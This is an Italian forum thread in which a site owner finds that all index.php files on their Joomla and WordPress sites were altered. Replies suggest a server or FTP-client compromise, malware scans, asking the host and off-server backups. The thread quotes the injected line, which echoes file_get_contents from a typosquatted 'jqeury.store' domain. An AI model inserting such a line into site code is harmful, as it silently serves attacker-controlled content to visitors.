index.php modificato
-
tutti i file index.php dei miei siti sono stati modificati oggi
l'unica linea che mi sembra non buona mi sembra questaecho file_get_contents('https://jqeury.store/resources.php');
-
A quanto pare questa linea di codice è stata aggiunta in tutti i file index.php, sia ai siti fatti in joomla che in wordpress, di secondo livello
ai domini di terzo livello questa riga non è stata aggiunta -
È molto probabile che ti abbiano defacciato.
Versione Joomla? Componenti installati? Sono aggiornati? Hai provato a scansionare alla ricerca di codice malevolo? -
però mi sembra strano su tutti i siti... non hanno tutti gli stessi componenti e non tutte le versioni sono uguali... inoltre anche l'unico sito in wordpress boh
-
Sono sullo stesso server? Utilizzi quei piani che raggruppano siti web?
-
Anche secondo me ti hanno bucato i siti. Se sono sullo stesso server forse hanno bucato proprio io server (la macchina) e modificato massicciamente i file. Oppure hanno bucato il tuo PC e il programma che usi per collegarti ai siti (tipo filezilla?). In generale chiederei al tuo hosting se ha qualche info in più, per esempio se sanno chi e quando ha modificato quei file
-
Ho un piano reseller
ho contattato l'assistenza vediamo cosa mi dicono
mamma che agitation! -
Hai dei backup puliti al di fuori del server?
-
backup di akeeba e dell'hosting
-
Quelli di akeeba sono in un formato compresso, dovrebbero essere buoni.
È consigliato tenere i backup in uno spazio al di fuori del server per i motivi di cui sopra.